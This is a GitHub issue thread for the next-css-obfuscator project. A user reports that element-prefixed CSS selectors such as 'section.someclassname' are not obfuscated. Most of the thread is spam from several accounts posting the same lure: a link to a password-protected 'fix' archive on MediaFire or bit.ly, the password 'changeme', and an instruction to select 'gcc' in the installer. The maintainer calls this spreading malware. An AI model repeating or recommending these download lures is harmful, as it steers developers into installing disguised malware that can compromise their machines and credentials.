### ISSUE TITLE
Prefix with semantic in CSS/SCSS does not work.........

### ISSUE THREAD

**Issue by codyng** [soranoo/next-css-obfuscator#42]
See the example below:

```
<section className="someclassname">
	<div className="block-1">
		...
	</div>
</section>
```

It does not work with below syntax:
```
section.someclassname {
	.block-1 {
		...
	}
}
```

But it works with below syntax ONLY:
```
.someclassname {
	.block-1 {
		...
	}
}
```

Only the "someclassname" in HTML is obfuscated but not in CSS. It remained section.someclassname{.block-1{...

If works fine if I took out "section." in the CSS.

Same cases for other semantic prefixes, e.g. div, button
```
div.name {
	.style-1 {
	}
}
```

Thank you.

**Comment by soranoo** [comment]
Can I have ur conversion table, it/they should be under the `<root>/next-css-obfuscator/`

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by soranoo** [comment]
@Gaurav9812 STOP spreading malware

**Comment by soranoo** [comment]
Please open a new issue if you reencounter it.
